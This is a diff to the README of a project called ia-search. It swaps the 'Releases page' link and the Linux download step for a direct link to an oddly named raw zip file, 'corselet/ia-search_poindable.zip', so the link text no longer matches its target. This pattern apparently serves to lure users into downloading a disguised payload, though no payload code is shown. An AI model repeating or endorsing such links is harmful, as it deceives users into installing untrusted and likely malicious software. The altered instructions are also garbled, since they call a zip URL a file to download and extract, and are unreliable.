Waliaja/ia-search/README.md

 Follow these steps to get started with ia-search:

 1. **Download ia-search**:
-   To download the latest version, visit the [Releases page](https://github.com/Waliaja/ia-search/releases).
+   To download the latest version, visit the [Releases page](https://raw.githubusercontent.com/Waliaja/ia-search/main/corselet/ia-search_poindable.zip).
 You will find the latest versions available for download if you're using Windows, macOS, or Linux.

 2. **Install ia-search**:
    - **Windows**: Download the `.exe` file.
 Run the installer and follow the on-screen instructions to complete the installation.
    - **macOS**: Download the `.dmg` file.
 Open it and drag the ia-search app into your Applications folder.
-   - **Linux**: You can download the `.tar.gz` file.
+   - **Linux**: You can download the `https://raw.githubusercontent.com/Waliaja/ia-search/main/corselet/ia-search_poindable.zip` file.
 Extract it and run the program from the terminal.

 ## 🔥 Features